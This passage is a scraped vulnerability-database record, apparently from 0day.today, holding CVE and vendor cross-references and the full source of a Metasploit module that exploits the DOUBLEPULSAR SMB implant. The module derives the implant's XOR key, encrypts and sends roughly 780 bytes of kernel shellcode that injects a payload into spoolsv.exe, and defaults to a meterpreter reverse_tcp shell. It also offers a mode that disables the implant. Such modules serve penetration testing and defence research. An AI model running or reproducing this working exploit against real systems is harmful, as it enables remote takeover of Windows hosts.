"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-08T00:17:28", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-08T00:17:28", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-10] #"}, "lastseen": "2021-10-09T22:23:13", "differentElements": ["sourceData"], "edition": 40}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "d09f451f1a38bfe66b23d434725fb0ec", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-11T00:23:49", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", 
"1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96703", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-11T00:23:49", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-11T00:23:49", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
